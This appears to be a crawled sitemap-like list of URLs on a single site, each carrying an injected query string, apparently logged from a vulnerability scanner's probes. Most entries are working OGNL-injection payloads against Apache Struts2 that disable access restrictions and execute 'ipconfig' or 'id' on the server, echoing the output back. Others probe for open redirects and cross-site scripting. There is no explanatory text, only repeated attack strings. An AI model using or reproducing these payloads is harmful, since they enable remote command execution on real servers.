http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=e8ift 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=e8ift? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=xsstest44b 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=fsm41352%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem74179 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=xsstest44b? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=osm22669%c0%beo1%c0%bco2a%90bcoem52341 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=fsm41352%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem74179? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=osm81289%c0%beo1%c0%bco2a%90bcoem89412 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=fsm35196%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem24161? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm35196%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem24161?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm81289%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem89412?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 